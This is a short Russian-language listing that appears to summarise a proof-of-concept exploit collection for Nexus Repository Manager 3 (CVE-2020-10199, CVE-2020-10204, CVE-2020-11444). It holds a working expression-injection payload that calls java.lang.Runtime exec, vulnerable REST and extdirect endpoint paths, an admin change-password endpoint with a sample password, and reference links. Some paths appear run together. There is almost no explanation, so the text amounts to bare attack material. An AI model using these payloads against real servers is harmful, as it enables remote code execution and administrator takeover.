
Коллекция PoC-эксплойтов для уязвимостей Nexus Repository Manager 3 (CVE-2020-10199, CVE-2020-10204, CVE-2020-11444), обеспечивающих удаленное выполнение кода и повышение привилегий через HTTP-эндпоинты.

$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10199')}
/service/rest/beta/repositories/go/group
/service/extdirect
/service/rest/beta/repositories/apt/hosted
/service/extdirect/service/extdirect/service/rest/beta/security/users/admin/change-password
POST:
123456
https://www.cnblogs.com/magic-zero/p/12641068.html
https://github.com/threedr3am/learnjavabug/tree/93d57c428333f98b5927d02630737e639dcb226b/nexus